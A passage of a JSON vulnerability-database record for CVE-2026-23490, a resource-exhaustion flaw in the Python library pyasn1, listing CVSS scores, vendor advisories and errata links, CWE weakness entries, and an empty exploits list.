            "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "7.5",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                }
            ],
            "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"
        },
        {
            "reference_url": "https://github.com/pyasn1/pyasn1",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "7.5",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "HIGH",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/pyasn1/pyasn1"
        },
        {
            "reference_url": "https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "7.5",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "HIGH",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496"
        },
        {
            "reference_url": "https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "7.5",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "HIGH",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/"
                }
            ],
            "url": "https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970"
        },
        {
            "reference_url": "https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "7.5",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "HIGH",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6"
        },
        {
            "reference_url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "7.5",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "HIGH",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/"
                }
            ],
            "url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2"
        },
        {
            "reference_url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "7.5",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "HIGH",
                    "scoring_system": "cvssv3.1_qr",
                    "scoring_elements": ""
                },
                {
                    "value": "HIGH",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/"
                }
            ],
            "url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq"
        },
        {
            "reference_url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "7.5",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "HIGH",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23490",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "7.5",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                },
                {
                    "value": "HIGH",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23490"
        },
        {
            "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753",
            "reference_id": "1125753",
            "reference_type": "",
            "scores": [],
            "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753"
        },
        {
            "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430472",
            "reference_id": "2430472",
            "reference_type": "",
            "scores": [],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430472"
        },
        {
            "reference_url": "https://github.com/advisories/GHSA-63vm-454h-vhhq",
            "reference_id": "GHSA-63vm-454h-vhhq",
            "reference_type": "",
            "scores": [
                {
                    "value": "HIGH",
                    "scoring_system": "cvssv3.1_qr",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/advisories/GHSA-63vm-454h-vhhq"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:1903",
            "reference_id": "RHSA-2026:1903",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:1903"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:1904",
            "reference_id": "RHSA-2026:1904",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:1904"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:1905",
            "reference_id": "RHSA-2026:1905",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:1905"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:1906",
            "reference_id": "RHSA-2026:1906",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:1906"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2221",
            "reference_id": "RHSA-2026:2221",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2221"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2299",
            "reference_id": "RHSA-2026:2299",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2299"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2300",
            "reference_id": "RHSA-2026:2300",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2300"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2302",
            "reference_id": "RHSA-2026:2302",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2302"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2303",
            "reference_id": "RHSA-2026:2303",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2303"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2309",
            "reference_id": "RHSA-2026:2309",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2309"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2453",
            "reference_id": "RHSA-2026:2453",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2453"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2460",
            "reference_id": "RHSA-2026:2460",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2460"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2483",
            "reference_id": "RHSA-2026:2483",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2483"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2486",
            "reference_id": "RHSA-2026:2486",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2486"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2712",
            "reference_id": "RHSA-2026:2712",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2712"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:2758",
            "reference_id": "RHSA-2026:2758",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:2758"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:3354",
            "reference_id": "RHSA-2026:3354",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:3354"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:3359",
            "reference_id": "RHSA-2026:3359",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:3359"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:3958",
            "reference_id": "RHSA-2026:3958",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:3958"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:3959",
            "reference_id": "RHSA-2026:3959",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:3959"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4138",
            "reference_id": "RHSA-2026:4138",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4138"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4139",
            "reference_id": "RHSA-2026:4139",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4139"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4140",
            "reference_id": "RHSA-2026:4140",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4140"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4141",
            "reference_id": "RHSA-2026:4141",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4141"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4142",
            "reference_id": "RHSA-2026:4142",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4142"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4143",
            "reference_id": "RHSA-2026:4143",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4143"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4144",
            "reference_id": "RHSA-2026:4144",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4144"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4145",
            "reference_id": "RHSA-2026:4145",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4145"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4146",
            "reference_id": "RHSA-2026:4146",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4146"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4147",
            "reference_id": "RHSA-2026:4147",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4147"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4148",
            "reference_id": "RHSA-2026:4148",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4148"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:4943",
            "reference_id": "RHSA-2026:4943",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:4943"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2026:5606",
            "reference_id": "RHSA-2026:5606",
            "reference_type": "",
            "scores": [],
            "url": "https://access.redhat.com/errata/RHSA-2026:5606"
        },
        {
            "reference_url": "https://usn.ubuntu.com/7975-1/",
            "reference_id": "USN-7975-1",
            "reference_type": "",
            "scores": [],
            "url": "https://usn.ubuntu.com/7975-1/"
        },
        {
            "reference_url": "https://usn.ubuntu.com/8134-1/",
            "reference_id": "USN-8134-1",
            "reference_type": "",
            "scores": [],
            "url": "https://usn.ubuntu.com/8134-1/"
        }
    ],
    "weaknesses": [
        {
            "cwe_id": 400,
            "name": "Uncontrolled Resource Consumption",
            "description": "The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources."
        },
        {
            "cwe_id": 770,
            "name": "Allocation of Resources Without Limits or Throttling",
            "description": "The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor."
        },
        {
            "cwe_id": 937,
            "name": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities",
            "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013."
        },
        {
            "cwe_id": 1035,
            "name": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities",
            "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017."
        }
    ],
    "exploits": [],
    "severity_range_score": "7.0 - 8.9",
    "exploitability": "0.5",
    "weighted_severity": "8.0",
    "risk_score": 4.0,
    "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bptp-5gn6-eucd"
}